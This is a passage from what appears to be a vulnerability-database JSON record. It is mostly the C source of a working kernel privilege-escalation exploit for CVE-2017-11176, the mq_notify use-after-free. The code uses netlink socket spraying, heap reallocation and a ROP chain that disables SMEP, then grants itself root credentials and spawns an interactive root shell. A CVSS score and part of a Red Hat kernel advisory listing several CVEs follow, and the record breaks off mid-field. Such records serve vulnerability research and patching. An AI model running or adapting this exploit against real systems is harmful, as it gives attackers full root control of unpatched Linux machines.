current->files->fdt->fd[unblock_fd]->private_data;\n void *sk;\n\n sk = sock->sk; // keep it for list walking\n sock->sk = NULL; // fix the 'sk' dangling pointer\n\n // lock all hash tables\n netlink_table_grab();\n\n // retrieve NETLINK_USERSOCK's hash table\n struct netlink_table *nl_table = * (struct netlink_table**)NL_TABLE_ADDR; // deref it!\n struct nl_pid_hash *hash = &(nl_table[NETLINK_USERSOCK].hash);\n\n // retrieve the bucket list\n struct hlist_head *bucket = nl_pid_hashfn(hash, g_target.pid);\n\n // walk the bucket list\n struct hlist_node *cur;\n struct hlist_node **pprev = &bucket->first;\n for (cur = bucket->first; cur; pprev = &cur->next, cur = cur->next)\n {\n // is this our target ?\n if (cur == (struct hlist_node*)sk)\n {\n // fix the 'next' and 'pprev' field\n if (cur->next == (struct hlist_node*)KMALLOC_TARGET) // 'cmsg_len' value (reallocation)\n cur->next = NULL; // first scenario: was the last element in the list\n cur->pprev = pprev;\n\n // __hlist_del() operation (dangling pointers fix up)\n *(cur->pprev) = cur->next;\n if (cur->next)\n cur->next->pprev = pprev;\n\n hash->entries--; // make it clean\n\n // stop walking\n break;\n }\n }\n\n // release the lock\n netlink_table_ungrab();\n\n // privilege (de-)escalation\n commit_creds(prepare_kernel_cred(NULL));\n}\n\n// ============================================================================\n// ----------------------------------------------------------------------------\n// ============================================================================\n\n/*\n * Migrates the current thread to CPU#0.\n *\n * Returns 0 on success, -1 on error.\n */\n\nstatic int migrate_to_cpu0(void)\n{\n cpu_set_t set;\n\n CPU_ZERO(&set);\n CPU_SET(0, &set);\n\n if (_sched_setaffinity(_getpid(), sizeof(set), &set) == -1)\n {\n perror(\"[-] sched_setaffinity\");\n return -1;\n }\n\n return 0;\n}\n\n// ============================================================================\n// ----------------------------------------------------------------------------\n// ============================================================================\n\n/*\n * Creates a NETLINK_USERSOCK netlink socket, binds it and retrieves its pid.\n * Argument @sp must not be NULL.\n *\n * Returns 0 on success, -1 on error.\n */\n\nstatic int create_netlink_candidate(struct sock_pid *sp)\n{\n struct sockaddr_nl addr = {\n .nl_family = AF_NETLINK,\n .nl_pad = 0,\n .nl_pid = 0, // zero to use netlink_autobind()\n .nl_groups = 0 // no groups\n\n };\n size_t addr_len = sizeof(addr);\n\n if ((sp->sock_fd = _socket(AF_NETLINK, SOCK_DGRAM, NETLINK_USERSOCK)) == -1)\n {\n perror(\"[-] socket\");\n goto fail;\n }\n\n if (_bind(sp->sock_fd, (struct sockaddr*)&addr, sizeof(addr)) == -1)\n {\n perror(\"[-] bind\");\n goto fail_close;\n }\n\n if (_getsockname(sp->sock_fd, &addr, &addr_len))\n {\n perror(\"[-] getsockname\");\n goto fail_close;\n }\n \n sp->pid = addr.nl_pid;\n\n return 0;\n\nfail_close:\n close(sp->sock_fd);\nfail:\n sp->sock_fd = -1;\n sp->pid = -1;\n return -1;\n}\n\n// ----------------------------------------------------------------------------\n\n/*\n * Parses @proto hash table from '/proc/net/netlink' and allocates/fills the\n * @pids array. The total numbers of pids matched is stored in @nb_pids.\n *\n * A typical output looks like:\n *\n * $ cat /proc/net/netlink\n * sk Eth Pid Groups Rmem Wmem Dump Locks Drops\n * ffff88001eb47800 0 0 00000000 0 0 (null) 2 0 \n * ffff88001fa65800 6 0 00000000 0 0 (null) 2 0 \n *\n * Every line is printed from netlink_seq_show():\n *\n * seq_printf(seq, \"%p %-3d %-6d %08x %-8d %-8d %p %-8d %-8d\\n\"\n *\n * Returns 0 on success, -1 on error.\n */\n\nstatic int parse_proc_net_netlink(int **pids, size_t *nb_pids, uint32_t proto)\n{\n int proc_fd;\n char buf[4096];\n int ret;\n char *ptr;\n char *eol_token;\n size_t nb_bytes_read = 0;\n size_t tot_pids = 1024;\n\n *pids = NULL;\n *nb_pids = 0;\n\n if ((*pids = calloc(tot_pids, sizeof(**pids))) == NULL)\n {\n perror(\"[-] not enough memory\");\n goto fail;\n }\n \n memset(buf, 0, sizeof(buf));\n if ((proc_fd = _open(\"/proc/net/netlink\", O_RDONLY)) < 0)\n {\n perror(\"[-] open\");\n goto fail;\n }\n\nread_next_block:\n if ((ret = _read(proc_fd, buf, sizeof(buf))) < 0)\n {\n perror(\"[-] read\");\n goto fail_close;\n }\n else if (ret == 0) // no more line to read\n {\n goto parsing_complete;\n }\n\n ptr = buf;\n\n if (strstr(ptr, \"sk\") != NULL) // this is the first line\n { \n if ((eol_token = strstr(ptr, \"\\n\")) == NULL)\n {\n // XXX: we don't handle this case, we can't even read one line...\n printf(\"[-] can't find end of first line\\n\");\n goto fail_close;\n }\n nb_bytes_read += eol_token - ptr + 1;\n ptr = eol_token + 1; // skip the first line\n }\n\nparse_next_line:\n // this is a \"normal\" line\n if ((eol_token = strstr(ptr, \"\\n\")) == NULL) // current line is incomplete\n {\n if (_lseek(proc_fd, nb_bytes_read, SEEK_SET) == -1)\n {\n perror(\"[-] lseek\");\n goto fail_close;\n }\n goto read_next_block;\n }\n else\n {\n void *cur_addr;\n int cur_proto;\n int cur_pid;\n\n sscanf(ptr, \"%p %d %d\", &cur_addr, &cur_proto, &cur_pid);\n\n if (cur_proto == proto)\n {\n if (*nb_pids >= tot_pids) // current array is not big enough, make it grow\n {\n tot_pids *= 2;\n if ((*pids = realloc(*pids, tot_pids * sizeof(int))) == NULL)\n {\n printf(\"[-] not enough memory\\n\");\n goto fail_close;\n }\n }\n\n *(*pids + *nb_pids) = cur_pid;\n *nb_pids = *nb_pids + 1;\n }\n\n nb_bytes_read += eol_token - ptr + 1;\n ptr = eol_token + 1;\n goto parse_next_line;\n }\n\nparsing_complete:\n close(proc_fd);\n return 0;\n\nfail_close:\n close(proc_fd);\nfail:\n if (*pids != NULL)\n free(*pids);\n *nb_pids = 0;\n return -1;\n}\n\n// ----------------------------------------------------------------------------\n\n/*\n * Prepare multiple netlink sockets and search \"adjacent\" ones. Arguments\n * @target and @guard must not be NULL.\n *\n * Returns 0 on success, -1 on error.\n */\n\nstatic int find_netlink_candidates(struct sock_pid *target, struct sock_pid *guard)\n{\n struct sock_pid candidates[MAX_SOCK_PID_SPRAY];\n int *pids = NULL;\n size_t nb_pids;\n int i, j;\n int nb_owned;\n int ret = -1;\n\n target->sock_fd = -1;\n guard->sock_fd = -1;\n\n // allocate a bunch of netlink sockets\n for (i = 0; i < MAX_SOCK_PID_SPRAY; ++i)\n {\n if (create_netlink_candidate(&candidates[i]))\n { \n printf(\"[-] failed to create a new candidate\\n\");\n goto release_candidates;\n }\n }\n printf(\"[+] %d candidates created\\n\", MAX_SOCK_PID_SPRAY);\n\n if (parse_proc_net_netlink(&pids, &nb_pids, NETLINK_USERSOCK))\n {\n printf(\"[-] failed to parse '/proc/net/netlink'\\n\");\n goto release_pids;\n }\n printf(\"[+] parsing '/proc/net/netlink' complete\\n\");\n\n // find two consecutives pid that we own (slow algorithm O(N*M))\n i = nb_pids;\n while (--i > 0)\n {\n guard->pid = pids[i];\n target->pid = pids[i - 1];\n nb_owned = 0;\n\n // the list is not ordered by pid, so we do a full walking\n for (j = 0; j < MAX_SOCK_PID_SPRAY; ++j) \n {\n if (candidates[j].pid == guard->pid)\n {\n guard->sock_fd = candidates[j].sock_fd;\n nb_owned++;\n }\n else if (candidates[j].pid == target->pid)\n {\n target->sock_fd = candidates[j].sock_fd;\n nb_owned++;\n }\n\n if (nb_owned == 2)\n goto found;\n }\n\n // reset sock_fd to release them\n guard->sock_fd = -1;\n target->sock_fd = -1;\n }\n\n // we didn't found any valid candidates, release and quit\n goto release_pids;\n\nfound:\n printf(\"[+] adjacent candidates found!\\n\");\n ret = 0; // we succeed\n\nrelease_pids:\n i = MAX_SOCK_PID_SPRAY; // reset the candidate counter for release\n if (pids != NULL)\n free(pids);\n\nrelease_candidates:\n while (--i >= 0)\n {\n // do not release the target/guard sockets\n if ((candidates[i].sock_fd != target->sock_fd) &&\n (candidates[i].sock_fd != guard->sock_fd))\n {\n close(candidates[i].sock_fd);\n }\n }\n\n return ret;\n} \n\n// ============================================================================\n// ----------------------------------------------------------------------------\n// ============================================================================\n\nstatic void* unblock_thread(void *arg)\n{\n struct unblock_thread_arg *uta = (struct unblock_thread_arg*) arg;\n int val = 3535; // need to be different than zero\n\n // notify the main thread that the unblock thread has been created. It *must*\n // directly call mq_notify().\n uta->is_ready = true; \n\n sleep(5); // gives some time for the main thread to block\n\n printf(\"[ ][unblock] closing %d fd\\n\", uta->sock_fd);\n _close(uta->sock_fd);\n\n printf(\"[ ][unblock] unblocking now\\n\");\n if (_setsockopt(uta->unblock_fd, SOL_NETLINK, NETLINK_NO_ENOBUFS, &val, sizeof(val)))\n perror(\"[+] setsockopt\");\n return NULL;\n}\n\n// ----------------------------------------------------------------------------\n\nstatic int decrease_sock_refcounter(int sock_fd, int unblock_fd)\n{\n pthread_t tid;\n struct sigevent sigev;\n struct unblock_thread_arg uta;\n char sival_buffer[NOTIFY_COOKIE_LEN];\n\n // initialize the unblock thread arguments\n uta.sock_fd = sock_fd;\n uta.unblock_fd = unblock_fd;\n uta.is_ready = false;\n\n // initialize the sigevent structure\n memset(&sigev, 0, sizeof(sigev));\n sigev.sigev_notify = SIGEV_THREAD;\n sigev.sigev_value.sival_ptr = sival_buffer;\n sigev.sigev_signo = uta.sock_fd;\n\n printf(\"[ ] creating unblock thread...\\n\");\n if ((errno = pthread_create(&tid, NULL, unblock_thread, &uta)) != 0)\n {\n perror(\"[-] pthread_create\");\n goto fail;\n }\n while (uta.is_ready == false) // spinlock until thread is created\n ;\n printf(\"[+] unblocking thread has been created!\\n\");\n\n printf(\"[ ] get ready to block\\n\");\n if ((_mq_notify((mqd_t)-1, &sigev) != -1) || (errno != EBADF))\n {\n perror(\"[-] mq_notify\");\n goto fail;\n }\n printf(\"[+] mq_notify succeed\\n\");\n\n return 0;\n\nfail:\n return -1;\n}\n\n// ----------------------------------------------------------------------------\n\nstatic int fill_receive_buffer(struct sock_pid *target, struct sock_pid *guard)\n{\n char buf[1024*10];\n int new_size = 0; // this will be reset to SOCK_MIN_RCVBUF\n\n struct sockaddr_nl addr = {\n .nl_family = AF_NETLINK,\n .nl_pad = 0,\n .nl_pid = target->pid, // use the target's pid\n .nl_groups = 0 // no groups\n };\n\n struct iovec iov = {\n .iov_base = buf,\n .iov_len = sizeof(buf)\n };\n\n struct msghdr mhdr = {\n .msg_name = &addr,\n .msg_namelen = sizeof(addr),\n .msg_iov = &iov,\n .msg_iovlen = 1,\n .msg_control = NULL,\n .msg_controllen = 0,\n .msg_flags = 0, \n };\n\n printf(\"[ ] preparing blocking netlink socket\\n\");\n\n if (_setsockopt(target->sock_fd, SOL_SOCKET, SO_RCVBUF, &new_size, sizeof(new_size)))\n perror(\"[-] setsockopt\"); // no worry if it fails, it is just an optim.\n else\n printf(\"[+] receive buffer reduced\\n\");\n\n printf(\"[ ] flooding socket\\n\");\n while (_sendmsg(guard->sock_fd, &mhdr, MSG_DONTWAIT) > 0)\n ;\n if (errno != EAGAIN)\n {\n perror(\"[-] sendmsg\");\n goto fail;\n }\n printf(\"[+] flood completed\\n\");\n\n printf(\"[+] blocking socket ready\\n\");\n\n return 0;\n\nfail:\n printf(\"[-] failed to prepare blocking socket\\n\");\n return -1;\n}\n\n// ============================================================================\n// ----------------------------------------------------------------------------\n// ============================================================================\n\n// ROP-chains\n#define STORE_EAX(addr) \\\n *stack++ = POP_RDI_ADDR; \\\n *stack++ = (uint64_t)addr + 4; \\\n *stack++ = MOV_PTR_RDI_MIN4_EAX_ADDR;\n \n#define SAVE_ESP(addr) \\\n STORE_EAX(addr);\n\n#define SAVE_RBP(addr_lo, addr_hi) \\\n *stack++ = MOV_RAX_RBP_ADDR; \\\n STORE_EAX(addr_lo); \\\n *stack++ = SHR_RAX_16_ADDR; \\\n *stack++ = SHR_RAX_16_ADDR; \\\n STORE_EAX(addr_hi);\n\n#define CR4_TO_RAX() \\\n *stack++ = POP_RBP_ADDR; \\\n *stack = (unsigned long) stack + 2*8; stack++; /* skip 0xdeadbeef */ \\\n *stack++ = MOV_RAX_CR4_LEAVE_ADDR; \\\n *stack++ = 0xdeadbeef; // dummy RBP value!\n\n#define RDI_TO_CR4() \\\n *stack++ = POP_RBP_ADDR; \\\n *stack = (unsigned long) stack + 2*8; stack++; /* skip 0xdeadbeef */ \\\n *stack++ = MOV_CR4_RDI_LEAVE_ADDR; \\\n *stack++ = 0xdeadbeef; // dummy RBP value!\n\n#define SMEP_MASK (~((uint64_t)(1 << 20))) // 0xffffffffffefffff\n\n#define DISABLE_SMEP() \\\n CR4_TO_RAX(); \\\n *stack++ = POP_RDI_ADDR; \\\n *stack++ = SMEP_MASK; \\\n *stack++ = MOV_EDX_EDI_ADDR; \\\n *stack++ = AND_RAX_RDX_ADDR; \\\n *stack++ = MOV_EDI_EAX_ADDR; \\\n RDI_TO_CR4();\n\n#define JUMP_TO(addr) \\\n *stack++ = POP_RCX_ADDR; \\\n *stack++ = (uint64_t) addr; \\\n *stack++ = JMP_RCX_ADDR;\n \n// ----------------------------------------------------------------------------\n\nextern void userland_entry(void); // make GCC happy\n\nstatic __attribute__((unused)) void wrapper(void) \n{\n // avoid the prologue\n __asm__ volatile( \"userland_entry:\" :: );\n\n // reconstruct original rbp/rsp\n restored_rbp = ((saved_rbp_hi << 32) | saved_rbp_lo);\n restored_rsp = ((saved_rbp_hi << 32) | saved_esp);\n \n __asm__ volatile( \"movq %0, %%rax\\n\"\n \"movq %%rax, %%rbp\\n\"\n :: \"m\"(restored_rbp) );\n\n __asm__ volatile( \"movq %0, %%rax\\n\" \n \"movq %%rax, %%rsp\\n\"\n :: \"m\"(restored_rsp) );\n\n uint64_t ptr = (uint64_t) &payload;\n __asm__ volatile( \"movq %0, %%rax\\n\"\n \"call *%%rax\\n\"\n :: \"m\"(ptr) );\n\n // arbitrary call primitive requires a non-null return value (i.e. non zero RAX register)\n __asm__ volatile( \"movq $5555, %%rax\\n\"\n :: );\n\n // avoid the epilogue and the \"leave\" instruction\n __asm__ volatile( \"ret\" :: );\n}\n\n// ----------------------------------------------------------------------------\n\nstatic void build_rop_chain(uint64_t *stack)\n{\n memset((void*)stack, 0xaa, 4096);\n\n SAVE_ESP(&saved_esp);\n SAVE_RBP(&saved_rbp_lo, &saved_rbp_hi);\n DISABLE_SMEP();\n JUMP_TO(&userland_entry);\n}\n\n// ----------------------------------------------------------------------------\n\nstatic int allocate_uland_structs(void)\n{\n // arbitrary value, must not collide with already mapped memory (/proc/<PID>/maps)\n void *starting_addr = (void*) 0x20000000;\n size_t max_try = 10;\n\nretry:\n if (max_try-- <= 0)\n {\n printf(\"[-] failed to allocate structures at fixed location\\n\");\n return -1;\n }\n\n starting_addr += 4096;\n\n g_fake_stack = (char*) _mmap(starting_addr, 4096, PROT_READ|PROT_WRITE,\n MAP_FIXED|MAP_SHARED|MAP_ANONYMOUS|MAP_LOCKED|MAP_POPULATE, -1, 0);\n if (g_fake_stack == MAP_FAILED)\n {\n perror(\"[-] mmap\");\n goto retry;\n }\n\n g_uland_wq_elt = (struct wait_queue*) _mmap(g_fake_stack + 0x100000000, 4096, PROT_READ|PROT_WRITE,\n MAP_FIXED|MAP_SHARED|MAP_ANONYMOUS|MAP_LOCKED|MAP_POPULATE, -1, 0);\n if (g_uland_wq_elt == MAP_FAILED)\n {\n perror(\"[-] mmap\");\n munmap((void*)g_fake_stack, 4096);\n goto retry;\n }\n\n // paranoid check\n if ((char*)g_uland_wq_elt != ((char*)g_fake_stack + 0x100000000))\n {\n munmap((void*)g_fake_stack, 4096);\n munmap((void*)g_uland_wq_elt, 4096);\n goto retry;\n }\n\n printf(\"[+] userland structures allocated:\\n\");\n printf(\"[+] g_uland_wq_elt = %p\\n\", g_uland_wq_elt);\n printf(\"[+] g_fake_stack = %p\\n\", g_fake_stack);\n\n return 0;\n}\n\n// ============================================================================\n// ----------------------------------------------------------------------------\n// ============================================================================\n\nstatic bool can_use_realloc_gadget(void)\n{\n int fd;\n int ret;\n bool usable = false;\n char buf[32];\n\n if ((fd = _open(\"/proc/sys/net/core/optmem_max\", O_RDONLY)) < 0)\n {\n perror(\"[-] open\");\n // TODO: fallback to sysctl syscall\n return false; // we can't conclude, try it anyway or not ?\n }\n\n memset(buf, 0, sizeof(buf));\n if ((ret = _read(fd, buf, sizeof(buf))) <= 0)\n {\n perror(\"[-] read\");\n goto out;\n }\n printf(\"[ ] optmem_max = %s\", buf);\n\n if (atol(buf) > 512) // only test if we can use the kmalloc-1024 cache\n usable = true;\n\nout:\n _close(fd);\n return usable;\n}\n\n// ----------------------------------------------------------------------------\n\nstatic int init_realloc_data(void)\n{\n struct cmsghdr *first;\n int* pid = (int*)&g_realloc_data[NLK_PID_OFFSET];\n void** groups = (void**)&g_realloc_data[NLK_GROUPS_OFFSET];\n struct wait_queue_head *nlk_wait = (struct wait_queue_head*) &g_realloc_data[NLK_WAIT_OFFSET];\n\n memset((void*)g_realloc_data, 'A', sizeof(g_realloc_data));\n\n // necessary to pass checks in __scm_send()\n first = (struct cmsghdr*) &g_realloc_data;\n first->cmsg_len = sizeof(g_realloc_data);\n first->cmsg_level = 0; // must be different than SOL_SOCKET=1 to \"skip\" cmsg\n first->cmsg_type = 1; // <---- ARBITRARY VALUE\n\n // used by reallocation checker\n *pid = MAGIC_NL_PID;\n *groups = MAGIC_NL_GROUPS;\n\n // the first element in nlk's wait queue is our userland element (task_list field!)\n BUILD_BUG_ON(offsetof(struct wait_queue_head, task_list) != WQ_HEAD_TASK_LIST_OFFSET);\n nlk_wait->slock = 0;\n nlk_wait->task_list.next = (struct list_head*)&g_uland_wq_elt->task_list;\n nlk_wait->task_list.prev = (struct list_head*)&g_uland_wq_elt->task_list;\n\n // initialise the \"fake\" second element (because of list_for_each_entry_safe())\n g_fake_next_elt.next = (struct list_head*)&g_fake_next_elt; // point to itself\n g_fake_next_elt.prev = (struct list_head*)&g_fake_next_elt; // point to itself\n\n // initialise the userland wait queue element\n BUILD_BUG_ON(offsetof(struct wait_queue, func) != WQ_ELMT_FUNC_OFFSET);\n BUILD_BUG_ON(offsetof(struct wait_queue, task_list) != WQ_ELMT_TASK_LIST_OFFSET);\n g_uland_wq_elt->flags = WQ_FLAG_EXCLUSIVE; // set to exit after the first arbitrary call\n g_uland_wq_elt->private = NULL; // unused\n g_uland_wq_elt->func = (wait_queue_func_t) XCHG_EAX_ESP_ADDR; // <----- arbitrary call! \n g_uland_wq_elt->task_list.next = (struct list_head*)&g_fake_next_elt;\n g_uland_wq_elt->task_list.prev = (struct list_head*)&g_fake_next_elt;\n printf(\"[+] g_uland_wq_elt.func = %p\\n\", g_uland_wq_elt->func);\n\n return 0;\n}\n\n// ----------------------------------------------------------------------------\n\nstatic bool check_realloc_succeed(int sock_fd, int magic_pid, unsigned long magic_groups)\n{\n struct sockaddr_nl addr;\n size_t addr_len = sizeof(addr);\n\n memset(&addr, 0, sizeof(addr));\n // this will invoke \"netlink_getname()\" (uncontrolled read)\n if (_getsockname(sock_fd, &addr, &addr_len))\n {\n perror(\"[-] getsockname\");\n goto fail;\n }\n printf(\"[ ] addr_len = %lu\\n\", addr_len);\n printf(\"[ ] addr.nl_pid = %d\\n\", addr.nl_pid);\n printf(\"[ ] magic_pid = %d\\n\", magic_pid);\n\n if (addr.nl_pid != magic_pid)\n {\n printf(\"[-] magic PID does not match!\\n\");\n goto fail;\n }\n\n if (addr.nl_groups != magic_groups) \n {\n printf(\"[-] groups pointer does not match!\\n\");\n goto fail;\n }\n\n return true;\n \nfail:\n printf(\"[-] failed to check realloc success status!\\n\");\n return false;\n}\n\n\n// ----------------------------------------------------------------------------\n\nstatic int init_unix_sockets(struct realloc_thread_arg * rta)\n{\n struct timeval tv;\n static int sock_counter = 0;\n\n if (((rta->recv_fd = _socket(AF_UNIX, SOCK_DGRAM, 0)) < 0) ||\n ((rta->send_fd = _socket(AF_UNIX, SOCK_DGRAM, 0)) < 0))\n {\n perror(\"[-] socket\");\n goto fail;\n }\n\n // bind an \"abstract\" socket (first byte is NULL)\n memset(&rta->addr, 0, sizeof(rta->addr));\n rta->addr.sun_family = AF_UNIX;\n sprintf(rta->addr.sun_path + 1, \"sock_%lx_%d\", _gettid(), ++sock_counter);\n if (_bind(rta->recv_fd, (struct sockaddr*)&rta->addr, sizeof(rta->addr)))\n {\n perror(\"[-] bind\");\n goto fail;\n }\n\n if (_connect(rta->send_fd, (struct sockaddr*)&rta->addr, sizeof(rta->addr)))\n {\n perror(\"[-] connect\");\n goto fail;\n }\n\n // set the timeout value to MAX_SCHEDULE_TIMEOUT\n memset(&tv, 0, sizeof(tv));\n if (_setsockopt(rta->recv_fd, SOL_SOCKET, SO_SNDTIMEO, &tv, sizeof(tv)))\n {\n perror(\"[-] setsockopt\");\n goto fail;\n }\n\n return 0;\n\nfail:\n // TODO: release everything\n printf(\"[-] failed to initialize UNIX sockets!\\n\");\n return -1;\n}\n\n// ----------------------------------------------------------------------------\n\nstatic void* realloc_thread(void *arg)\n{\n struct realloc_thread_arg *rta = (struct realloc_thread_arg*) arg;\n struct msghdr mhdr;\n char buf[200];\n\n // initialize msghdr\n struct iovec iov = {\n .iov_base = buf,\n .iov_len = sizeof(buf),\n };\n memset(&mhdr, 0, sizeof(mhdr));\n mhdr.msg_iov = &iov;\n mhdr.msg_iovlen = 1;\n\n // the thread should inherit main thread cpumask, better be sure and redo-it!\n if (migrate_to_cpu0())\n goto fail;\n\n // make it block\n while (_sendmsg(rta->send_fd, &mhdr, MSG_DONTWAIT) > 0)\n ;\n if (errno != EAGAIN)\n { \n perror(\"[-] sendmsg\");\n goto fail;\n }\n\n // use the arbitrary data now\n iov.iov_len = 16; // don't need to allocate lots of memory now\n mhdr.msg_control = (void*)g_realloc_data; // use the ancillary data buffer\n mhdr.msg_controllen = sizeof(g_realloc_data);\n\n g_nb_realloc_thread_ready++;\n\n while (!g_realloc_now) // spinlock until the big GO!\n ;\n\n // the next call should block while \"reallocating\"\n if (_sendmsg(rta->send_fd, &mhdr, 0) < 0)\n {\n perror(\"[-] sendmsg\");\n goto fail;\n }\n\n return NULL;\n\nfail:\n printf(\"[-] REALLOC THREAD FAILURE!!!\\n\");\n return NULL;\n}\n\n// ----------------------------------------------------------------------------\n\nstatic int init_reallocation(struct realloc_thread_arg *rta, size_t nb_reallocs)\n{\n int thread = 0;\n int ret = -1;\n\n if (!can_use_realloc_gadget())\n {\n printf(\"[-] can't use the 'ancillary data buffer' reallocation gadget!\\n\");\n goto fail;\n }\n printf(\"[+] can use the 'ancillary data buffer' reallocation gadget!\\n\");\n\n if (init_realloc_data())\n {\n printf(\"[-] failed to initialize reallocation data!\\n\");\n goto fail;\n }\n printf(\"[+] reallocation data initialized!\\n\");\n\n printf(\"[ ] initializing reallocation threads, please wait...\\n\");\n for (thread = 0; thread < nb_reallocs; ++thread)\n {\n if (init_unix_sockets(&rta[thread]))\n {\n printf(\"[-] failed to init UNIX sockets!\\n\");\n goto fail;\n }\n\n if ((ret = pthread_create(&rta[thread].tid, NULL, realloc_thread, &rta[thread])) != 0)\n {\n perror(\"[-] pthread_create\");\n goto fail;\n }\n }\n\n // wait until all threads have been created\n while (g_nb_realloc_thread_ready < nb_reallocs)\n _sched_yield(); // don't run me, run the reallocator threads!\n\n printf(\"[+] %lu reallocation threads ready!\\n\", nb_reallocs);\n\n return 0;\n\nfail:\n printf(\"[-] failed to initialize reallocation\\n\");\n return -1;\n}\n\n// ----------------------------------------------------------------------------\n\n// keep this inlined, we can't loose any time (critical path)\nstatic inline __attribute__((always_inline)) void realloc_NOW(void)\n{\n g_realloc_now = 1;\n _sched_yield(); // don't run me, run the reallocator threads!\n sleep(5);\n}\n\n// ============================================================================\n// ----------------------------------------------------------------------------\n// ============================================================================\n\nint main(void)\n{\n int sock_fd2 = -1;\n int val;\n struct realloc_thread_arg rta[NB_REALLOC_THREADS];\n\n printf(\"[ ] -={ CVE-2017-11176 Exploit }=-\\n\");\n\n if (migrate_to_cpu0())\n {\n printf(\"[-] failed to migrate to CPU#0\\n\");\n goto fail;\n }\n printf(\"[+] successfully migrated to CPU#0\\n\");\n\n if (allocate_uland_structs())\n {\n printf(\"[-] failed to allocate userland structures!\\n\");\n goto fail;\n }\n\n build_rop_chain((uint64_t*)g_fake_stack);\n printf(\"[+] ROP-chain ready\\n\");\n\n memset(rta, 0, sizeof(rta));\n if (init_reallocation(rta, NB_REALLOC_THREADS))\n {\n printf(\"[-] failed to initialize reallocation!\\n\");\n goto fail;\n }\n printf(\"[+] reallocation ready!\\n\");\n\n if (find_netlink_candidates(&g_target, &g_guard))\n {\n printf(\"[-] failed to find netlink candidates\\n\");\n goto fail;\n }\n printf(\"[+] netlink candidates ready:\\n\");\n printf(\"[+] target.pid = %d\\n\", g_target.pid);\n printf(\"[+] guard.pid = %d\\n\", g_guard.pid);\n\n if (fill_receive_buffer(&g_target, &g_guard))\n goto fail;\n\n if (((unblock_fd = _dup(g_target.sock_fd)) < 0) ||\n ((sock_fd2 = _dup(g_target.sock_fd)) < 0))\n {\n perror(\"[-] dup\");\n goto fail;\n }\n printf(\"[+] netlink fd duplicated (unblock_fd=%d, sock_fd2=%d)\\n\", unblock_fd, sock_fd2);\n\n // trigger the bug twice AND immediatly realloc!\n if (decrease_sock_refcounter(g_target.sock_fd, unblock_fd) ||\n decrease_sock_refcounter(sock_fd2, unblock_fd))\n {\n goto fail;\n }\n realloc_NOW();\n\n // close it before invoking the arbitrary call\n close(g_guard.sock_fd);\n printf(\"[+] guard socket closed\\n\");\n\n if (!check_realloc_succeed(unblock_fd, MAGIC_NL_PID, MAGIC_NL_GROUPS))\n {\n printf(\"[-] reallocation failed!\\n\");\n // TODO: retry the exploit\n goto fail;\n }\n printf(\"[+] reallocation succeed! Have fun :-)\\n\");\n\n\n // trigger the arbitrary call primitive\n printf(\"[ ] invoking arbitrary call primitive...\\n\");\n val = 3535; // need to be different than zero\n if (_setsockopt(unblock_fd, SOL_NETLINK, NETLINK_NO_ENOBUFS, &val, sizeof(val)))\n {\n perror(\"[-] setsockopt\");\n goto fail;\n }\n printf(\"[+] arbitrary call succeed!\\n\");\n\n printf(\"[+] exploit complete!\\n\");\n\n printf(\"[ ] popping shell now!\\n\");\n char* shell = \"/bin/bash\";\n char* args[] = {shell, \"-i\", NULL};\n execve(shell, args, NULL);\n\n return 0;\n\nfail:\n printf(\"[-] exploit failed!\\n\");\n PRESS_KEY();\n return -1;\n}\n\n// ============================================================================\n// ----------------------------------------------------------------------------\n// ============================================================================", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "redhat": [{"lastseen": "2019-08-13T18:47:00", "bulletinFamily": "unix", "cvelist": ["CVE-2017-1000111", "CVE-2017-1000112", "CVE-2017-11176", "CVE-2017-14106", "CVE-2017-14340", "CVE-2017-7184", "CVE-2017-7541", "CVE-2017-7542", "CVE-2017-7558"], "description": "The kernel-rt packages provide the Real Time Linux Kernel, which enables fine-tuning for systems with extremely high determinism requirements.\n\nSecurity Fix(es):\n\n* Out-of-bounds kernel heap access vulnerability was found in xfrm, kernel's IP framework for transforming packets. An error dealing with netlink messages from an unprivileged user leads to arbitrary read/write and privilege escalation. (CVE-2017-7184, Important)\n\n* A race condition issue leading to a use-after-free flaw was found in the way the raw packet sockets are implemented in the Linux kernel networking subsystem handling synchronization. A local user able to open a raw packet socket (requires the CAP_NET_RAW capability) could use this flaw to elevate their privileges on the system. (CVE-2017-1000111, Important)\n\n* An exploitable memory corruption flaw was found in the Linux kernel. The append path can be erroneously switched from UFO to non-UFO in ip_ufo_append_data() when building an UFO packet with MSG_MORE option. If unprivileged user namespaces are available, this flaw can be exploited to gain root privileges. (CVE-2017-1000112, Important)\n\n* Kernel memory corruption due to a buffer overflow was found in brcmf_cfg80211_mgmt_tx() function in Linux kernels from v3.9-rc1 to v4.13-rc1. The vulnerability can be triggered by sending a crafted NL80211_CMD_FRAME packet via netlink. This flaw is unlikely to be triggered remotely as certain userspace code is needed for this. An unprivileged local user could use this flaw to induce kernel memory corruption on the system, leading to a crash. Due to the nature of the flaw, privilege escalation cannot be fully ruled out, although it is unlikely. (CVE-2017-7541, Moderate)\n\n* An integer overflow vulnerability in ip6_find_1stfragopt() function was found. A local attacker that has privileges (of CAP_NET_RAW) to open raw socket can cause an infinite loop inside the ip6_find_1stfragopt() function. (CVE-2017-7542, Moderate)\n\n* A kernel data leak due to an out-of-bound read was found in the Linux kernel in inet_diag_msg_sctp{,l}addr_fill() and sctp_get_sctp_info() functions present since version 4.7-rc1 through version 4.13. A data leak happens when these functions fill in sockaddr data structures used to export socket's diagnostic information. As a result, up to 100 bytes of the slab data could be leaked to a userspace. (CVE-2017-7558, Moderate)\n\n* The mq_notify function in the Linux kernel through 4.11.9 does not set the sock pointer to NULL upon entry into the retry logic. During a user-space close of a Netlink socket, it allows attackers to possibly cause a situation where a value may be used after being freed (use-after-free) which may lead to memory corruption or other unspecified other impact. (CVE-2017-11176, Moderate)\n\n* A divide-by-zero vulnerability was found in the __tcp_select_window function in the Linux kernel. This can result in a kernel panic causing a local denial of service. (CVE-2017-14106, Moderate)\n\n* A flaw was found where the XFS filesystem code mishandles a user-settable inode flag in the Linux kernel prior to 4.14-rc1. This can cause a local denial of service via a kernel panic. (CVE-2017-14340, Moderate)\n\nRed Hat would like to thank Chaitin Security Research Lab for reporting CVE-2017-7184; Willem de Bruijn for reporting CVE-2017-1000111; and Andrey Konovalov for reporting CVE-2017-1000112. The CVE-2017-7558 issue was discovered by Stefano Brivio (Red Hat) and the CVE-2017-14340 issue was discovered by Dave Chinner (Red Hat).\n\nBug Fix(es):\n\n* kernel-rt packages have been upgraded to the 3.10.0-693.5.2 source tree, which provides number of bug fixes over the previous version. (BZ#1489085)", "modified": 